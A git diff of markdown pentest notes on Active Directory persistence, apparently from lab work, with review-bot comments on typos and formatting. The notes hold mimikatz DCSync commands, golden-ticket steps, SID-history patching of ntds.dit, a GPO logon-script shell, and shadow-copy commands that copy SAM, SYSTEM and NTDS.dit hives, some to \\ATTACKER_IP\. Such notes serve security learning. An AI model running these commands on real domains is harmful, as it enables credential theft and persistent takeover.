even more info
This commit is contained in:
parent
c78967a9a9
commit
e8c3e42f94
|
|
@ -1,9 +1,8 @@
|
||||||
# Active Directory Persistance
|
# Active Directory Persistance
|
||||||
|
|
||||||
|
|
||||||
## Using Credentials
|
## Using Credentials
|
||||||
|
|
||||||
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
||||||
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
||||||
* Credentials for multiple local administrators
|
* Credentials for multiple local administrators
|
||||||
* Service account with delegation permissions
|
* Service account with delegation permissions
|
||||||
|
|
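Review bot: the title kept as context at the top of this hunk still reads `# Active Directory Persistance`; since the hunk already touches the first nine lines of the file it is the right place to correct it to `# Active Directory Persistence`. Two smaller wording points in the same context lines: the KCC bullet says KCC "replicates credentials through the forest" while the bullet right after it already describes the credential replication itself as DC synchronisation, so the KCC line should state what KCC actually contributes, namely building and maintaining the replication topology that the synchronisation runs over; and the DC Synchronisation bullet is a comma splice that reads better as two sentences ("... between domain controllers. It can be used to gather credentials.").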
@ -11,22 +10,27 @@
|
||||||
|
|
||||||
### Usage
|
### Usage
|
||||||
|
|
||||||
* Use mimikatz
|
Use mimikatz
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /user:<username>
|
lsadump::dcsync /domain:<domain> /user:<username>
|
||||||
```
|
```
|
||||||
* To query the krbtgt user
|
|
||||||
|
To query the krbtgt user
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
||||||
```
|
```
|
||||||
* Query everything
|
|
||||||
|
Query everything
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
lsadump::dcsync /domain:<domain> /all
|
lsadump::dcsync /domain:<domain> /all
|
||||||
```
|
```
|
||||||
|
|
||||||
## Using Tickets
|
## Using Tickets
|
||||||
|
|
||||||
* __Golden Ticket__ crafted TGT,
|
* __Golden Ticket__ crafted TGT,
|
||||||
* Needs domain name, domain SID and a user ID to impersonate
|
* Needs domain name, domain SID and a user ID to impersonate
|
||||||
* Needs krbtgt NTLM to sign the ticket
|
* Needs krbtgt NTLM to sign the ticket
|
||||||
* krbtgt hash never rotates automatically, only refreshed manually
|
* krbtgt hash never rotates automatically, only refreshed manually
|
||||||
|
|
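Review bot: the edits in this hunk drop the leading `* ` from `Use mimikatz`, `To query the krbtgt user` and `Query everything`, turning list items into bare paragraphs while the rest of the file (for example `* Craft a golden ticket` in the next hunk) keeps the bullet-then-fence pattern; either keep the bullets or apply the same change throughout so the rendered list stays consistent. Unrelated to the change but on a line this hunk carries: the krbtgt command uses `/user:krbtgt.<domain>` whereas the first command uses a bare account name with `/user:<username>` and lets `/domain:` scope the lookup; the `.<domain>` suffix looks like a typo and should be made consistent with the first form.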
@ -40,7 +44,7 @@ lsadump::dcsync /domain:<domain> /all
|
||||||
* DC is never contacted, no contact to any TGT or KDC
|
* DC is never contacted, no contact to any TGT or KDC
|
||||||
* Non existing user can be used with a local admin group's SID
|
* Non existing user can be used with a local admin group's SID
|
||||||
|
|
||||||
### Usage
|
### Usage
|
||||||
|
|
||||||
* Craft a golden ticket
|
* Craft a golden ticket
|
||||||
```sh
|
```sh
|
||||||
|
|
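Review bot: the context line `DC is never contacted, no contact to any TGT or KDC` is internally odd, since a TGT is the ticket being forged rather than something that is contacted; the line reads more precisely as "DC is never contacted: no TGT request is sent to the KDC", which is also what its first clause already says. The next bullet should read `A non-existent user can be used ...`. As this hunk has no visible `+`/`-` lines the change appears to be whitespace only; saying so in the commit message (`even more info` does not) would help reviewers.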
@ -95,22 +99,24 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
|
||||||
```sh
|
```sh
|
||||||
Get-ADGroup "Domain Admins"
|
Get-ADGroup "Domain Admins"
|
||||||
```
|
```
|
||||||
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
|
||||||
|
Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
Stop-Service -Name ntds -force
|
Stop-Service -Name ntds -force
|
||||||
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
||||||
Start-Service -Name ntds
|
Start-Service -Name ntds
|
||||||
```
|
```
|
||||||
* Verify users SIDs
|
* Verify users SIDs
|
||||||
```sh
|
```sh
|
||||||
Get-ADUser <username> -Properties sidhistory
|
Get-ADUser <username> -Properties sidhistory
|
||||||
dir \\<dc.example.com>\C$\
|
dir \\<dc.example.com>\C$\
|
||||||
```
|
```
|
||||||
|
|
||||||
## Using Group Memberships
|
## Using Group Memberships
|
||||||
|
|
||||||
* Most are monitored security wise
|
* Most are monitored security wise
|
||||||
* Interesting group for persistence are
|
* Interesting group for persistence are
|
||||||
* `IT Support`
|
* `IT Support`
|
||||||
* Local administrational accounts
|
* Local administrational accounts
|
||||||
* Groups with ownership over GPO
|
* Groups with ownership over GPO
|
||||||
|
|
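Review bot: same list-marker issue as in the earlier hunk: the `+` line replaces `* Use [DSInternals](...) to patch `ntds.dit`` with the same text minus the bullet, while `* Verify users SIDs` a few lines later keeps its bullet, so the two steps of one procedure now render differently. In the context lines: `low-priveleged` in the `Add-ADDBSidHistory` placeholder should be `low-privileged`, `Verify users SIDs` should be `Verify the user's SIDs`, `Interesting group for persistence are` should be `Interesting groups for persistence are`, and `Local administrational accounts` should be `Local administrator accounts`. It would also help to say next to `Stop-Service -Name ntds -force` that the directory service is stopped while the database file is patched and only started again afterwards, since that consequence is easy to miss when reading the three commands as one block.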
@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<userna
|
||||||
```
|
```
|
||||||
* And nesting another one
|
* And nesting another one
|
||||||
```sh
|
```sh
|
||||||
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
||||||
|
|
||||||
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
|
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
|
||||||
```
|
```
|
||||||
|
|
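Review bot: the `New-ADGroup` line in this hunk hard-codes `DC=ZA,DC=TRYHACKME,DC=LOC` and `OU=SALES`, while the hunk header's context line (`-Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM"`) uses placeholders for the same kind of path; the nested-group example should use the same `<SUBDC>`/`<DOMAIN>` placeholders so the second command is not tied to one lab environment. The lead-in `* And nesting another one` could also name what is nested, for example `* Nest a second group inside the first`, since the `Add-ADGroupMember` line makes `<username>_steam_network1` a member of `<username>_steam_network2`.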
@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins"
|
||||||
|
|
||||||
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
|
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
|
||||||
* Domain Admins
|
* Domain Admins
|
||||||
* Administrators
|
* Administrators
|
||||||
* Enterprise/Schema Administrator
|
* Enterprise/Schema Administrator
|
||||||
* SDProp as a process maps the ACLs to protected groups every hour
|
* SDProp as a process maps the ACLs to protected groups every hour
|
||||||
|
|
||||||
|
|
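Review bot: `AD group templates like `AdminSDHolder`` mislabels the object: the rest of the bullet and the `SDProp as a process maps the ACLs to protected groups every hour` line describe `AdminSDHolder` as the object whose ACL is copied onto the protected groups, so it should be introduced as that template object rather than as a group. The sub-list should also use the actual group names consistently with `Domain Admins`: `Enterprise Admins` and `Schema Admins` rather than `Enterprise/Schema Administrator`.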
@ -190,7 +196,7 @@ copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe &
|
||||||
* Select the previously created batch script and PE
|
* Select the previously created batch script and PE
|
||||||
* Catch the shell when an admin logs on
|
* Catch the shell when an admin logs on
|
||||||
|
|
||||||
* Once again open mmc
|
* Once again open mmc
|
||||||
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
|
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
|
||||||
* Click on every other group except Authenticated Users and remove them
|
* Click on every other group except Authenticated Users and remove them
|
||||||
|
|
||||||
|
|
|
||||||
|
|
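Review bot: `Right click Enterprise Domain Controllers -> Edit settings, delete, modify security` reads as three separate actions after the arrow; quoting the permission level as one item (`-> "Edit settings, delete, modify security"`) makes clear that a single permission entry is being selected. The three `mmc` steps beginning at `Once again open mmc` are also a separate procedure from `Catch the shell when an admin logs on` above them; a short lead-in line stating what they achieve (which groups are left with access to the GPO) would keep the list readable.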
@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### In case you are on a DC
|
||||||
|
|
||||||
|
You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
|
||||||
|
|
||||||
|
```sh
|
||||||
|
vssadmin create shadow /for=C:
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
|
||||||
|
vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
|
||||||
|
```
|
||||||
|
|
||||||
### Dump LSASS
|
### Dump LSASS
|
||||||
|
|
||||||
LSASS contains multiple different credential types like NTLM password hashes,
|
LSASS contains multiple different credential types like NTLM password hashes,
|
||||||
|
|
|
||||||
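Review bot: the added paragraph says `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`, but the `copy` command two lines below and the `-DatabasePath C:\Windows\NTDS\ntds.dit` argument earlier in the file both use `ntds.dit`; fix the typo in the prose. In the added block, the two `copy` lines hard-code `HarddiskVolumeShadowCopy1` while the delete line uses the `{$SHADOW_ID}` placeholder; both the shadow copy volume number and the shadow ID come from the output of `vssadmin create shadow /for=C:`, so a sentence saying that both values must be read from that output (the `1` in the path is not a fixed value) would make the block self-consistent. The fence is tagged `sh` although these are Windows `cmd` commands; that matches the existing blocks in the file, so it is fine to keep, but worth noting if the fences are ever normalised.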